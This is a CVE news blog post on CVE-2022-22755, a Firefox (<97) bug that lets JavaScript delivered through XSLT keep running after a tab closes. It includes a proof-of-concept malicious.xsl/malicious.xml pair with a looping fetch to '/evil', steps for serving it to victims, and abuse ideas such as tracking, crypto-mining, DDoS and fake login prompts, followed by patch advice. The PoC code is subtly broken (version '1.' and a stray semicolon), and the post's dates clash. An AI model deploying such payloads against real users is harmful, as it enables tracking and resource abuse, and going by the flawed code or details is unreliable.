CVE CyberSecurity Database News

CVE-2022-22755 - Exploiting XSLT for Persistent JavaScript Execution in Firefox (<97)

Poster -

In February 2022, Mozilla disclosed a critical flaw in Firefox: CVE-2022-22755. This vulnerability stems from the way Firefox handles XSLT (Extensible Stylesheet Language Transformations) scripts, allowing JavaScript to run even after a user closes a browser tab. While it honors the same-origin policy, the mere ability to persist code execution so easily is dangerous. This post breaks down how the bug works, how attackers could exploit it, and ways to protect yourself.

What is XSLT and Why Does it Matter?

XSLT is a powerful language used to transform XML documents into different formats, usually HTML. Firefox (and most browsers) allow XSLT execution, but security boundaries are supposed to limit what scripts can do, especially once a tab is closed.

However, CVE-2022-22755 is a classic example of how mixing web technologies can break security assumptions.

Vulnerability Summary

> By using XSL Transforms, a malicious web server could have served a user an XSL document that would continue to execute JavaScript (within the bounds of the same-origin policy) even after the tab was closed. This vulnerability affects Firefox versions earlier than 97.

Affected Browsers: Firefox < 97 (desktop and Android)

- Score: High/critical

How It Works (Technical Overview)

1. Attacker creates a malicious web server that serves an XML document which references a specially crafted XSLT stylesheet.
2. The XSL file contains JavaScript, embedded via <script> tags, taking advantage of Firefox's ability to handle inline JavaScript in XSLT.
3. When a user visits the attacker’s page, Firefox processes the XSLT, executing the JavaScript as part of the document transformation.
4. Bug trigger: Even after the user closes the tab, the XSLT-transformed document (and its JavaScript) can persist in memory and keep running code in the browser context!

Why does this happen? In affected Firefox versions, XSLT output is linked too closely to the browser's internal document management, so the transformation context isn’t destroyed when the tab closes.

malicious.xsl

<?xml version="1."?>
<xsl:stylesheet version="1."
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform">;
  <xsl:template match="/">
    <html>
      <body>
        <script>
            // This JavaScript will execute as part of the transformed page
            setTimeout(function repeat() {
                fetch('/evil').then(()=>repeat()); // Simulate persistence
            }, 100);
            // This code will persist even if the tab is closed in vulnerable Firefox
        </script>
        <h1>You are pwned!</h1>
      </body>
    </html>
  </xsl:template>
</xsl:stylesheet>

malicious.xml

<?xml version="1."?>
<?xml-stylesheet type="text/xsl" href="malicious.xsl"?>
<data></data>

How to Serve

Using a small HTTP server, host both files. When a victim opens malicious.xml in Firefox <97, the XSLT JavaScript runs *and may persist even after closing the tab*.

Persistent Tracking: Run scripts to fingerprint visitors or phone home repeatedly.

- Resource Abuse: Force the browser to mine crypto, perform DDoS, or similar, even after you've closed the offending site.

Additional Phishing: Pop up fake login prompts or notifications.

- Attackers can only operate within the same origin, so this is not a cross-origin privilege escalation.

Real-World Demonstration

A proof-of-concept was published and tracked by Mozilla in Bugzilla #1729847.

There’s also a technical write-up by Mozilla’s security team.

Prevention and Remediation

- Update Firefox: Version 97 and newer fully patch this problem. Get the latest at: https://www.mozilla.org/firefox/
- Disable XSLT (Advanced): You can block XSLT processing by toggling layout.xml.enable_xslt in about:config. (Not recommended unless you know what you're doing.)
- Avoid Suspicious XML/XSL Links: Never open random XML files or XSLT links received via email or dubious websites.

References

- Mozilla Security Advisory MFSA 2022-06
- Bugzilla #1729847 - XSLT Document Outlives Tab
- CVE-2022-22755 in NIST NVD

Summary

CVE-2022-22755 underscores the importance of browser patching and careful handling of XML/XSLT on the web. This bug allowed attackers to run persistent scripts through XSLT, breaking the trust model of tab lifecycle in Firefox.

If you use Firefox, make sure it's up-to-date—and if you develop web applications, be aware of how old browser bugs like this can make even "safe" features dangerous.

Timeline

Published on: 12/22/2022 20:15:00 UTC
Last modified on: 12/29/2022 23:08:00 UTC